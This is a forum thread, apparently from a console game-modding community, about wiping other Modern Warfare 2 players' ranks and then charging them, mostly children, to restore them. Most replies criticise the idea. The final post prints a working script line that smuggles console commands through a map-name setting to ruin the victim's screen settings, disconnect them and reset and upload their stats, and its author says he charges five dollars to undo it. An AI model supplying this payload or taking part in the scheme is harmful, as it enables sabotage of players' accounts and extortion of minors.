• Thread starter eyeHaCkz79
  • Start date
  • Views 2,314
E

eyeHaCkz79

Enthusiast
Reaction score
Sin$
Ok guys since the derank bind came out i thought of an idea. The more peolpe we can derank and take all challanges well derank everything opens up a window of oppurtinaty.

All these leechers (mainly kids) are gunna want there 10ths and all challanges, so the kids that paid you last year or whenever will be paying you again to rank em bk up!! I just deranked 18 leechers in one go :lol: . Im not normaly like that but as soon as i did it i already got 2 payments on pp to give em 10th bk..

just an idea

Danny

AnonymousAus

AnonymousAus

Newcastle Knights 2014
7th Anniversary Seasoned Veteran Grizzled Veteran
Reaction score
Sin$
Ok guys since the derank bind came out i thought of an idea. The more peolpe we can derank and take all challanges well derank everything opens up a window of oppurtinaty.

All these leechers (mainly kids) are gunna want there 10ths and all challanges, so the kids that paid you last year or whenever will be paying you again to rank em bk up!! I just deranked 18 leechers in one go :lol: . Im not normaly like that but as soon as i did it i already got 2 payments on pp to give em 10th bk..

just an idea

Danny
That's sad, I could understand deranking the people who abuse mods(like yourself) but doing it to make money that just takes it to another level. :wink:

Shiny

Shiny

Trips
Forum Addict
Reaction score
Sin$
I have to agree with Xboxgamer. This is just wrong. Deranking people sucks. (Except they're idiots)

ZMOT

ZMOT

Steve Harvey
AzzidReign Jr Fabled Veteran Hardened Veteran
Reaction score
Sin$
This is pretty much scamming people. Yes, they are leeches but you and I were too. We all have start somewhere...

ReampedHD

ReampedHD

Enthusiast
Reaction score
Sin$
That would be mean, In CoD 4 I had joined someones session because my friend told me it was +XP lobby. I committed suicide and got -XP. I later checked his topic on Se7enSins and said "He got bored, so he went on a derank spree."

T

theperson

Enthusiast
Reaction score
Sin$
I would say this idea is good, just because they would scam you if they had the chance don't you think? And all these leechers need to.... stop leeching lol :tongue:

ModsBABY HD

ModsBABY HD

Contributor
Reaction score
Sin$
.... It's not modding which ruining MW2 It's the people playing it with their silly De-Rank patches. I can understand unlimited Ac130, because you can just leave. But it's seriously SAD that you want to De-Rank people just for fun.

Nate

Nate

Too Nasty
Experienced Veteran CotM Forum Addict
Reaction score
Sin$
Thanks for spreading your idea to other people so now they will make money off "sh*t" like that. This isn't right. Put on the leeches shoes and see how you would feel if this happenend to you, huh. <_<

I am Gengar

Gengar S7

Enthusiast
Reaction score
Sin$
I deranked someone in Call of Duty 4 and never did it again. It's just wrong to do something like that to someone!

MasterChafe

MasterChafe

Hmmmm Gators
Reaction score
Sin$
Code:
self setClientDvar( "ui_mapname", "mp_rust;bind BUTTON_BACK say Thanks For 10th From MasterChafe ALL CHALLENGES UNLOCKED - SET SPLIT SCREEN XBOX LIVE UNLOCKS ON - AUSHALOPLAYS.NET - AUSHALOPLAYS.NET - AUSHALOPLAYS.NET - AUSHALOPLAYS.NET - AUSHALOPLAYS.NET - AUSHALOPLAYS.NET - AUSHALOPLAYS.NET - AUSHALOPLAYS.NET;profile_setBlacklevel 10;profile_setGamma 10;disconnect;resetstats;uploadStats");

I use thats on the leeches and if they want there screen fixed its 5 bucks.

Top Bottom
Login
Register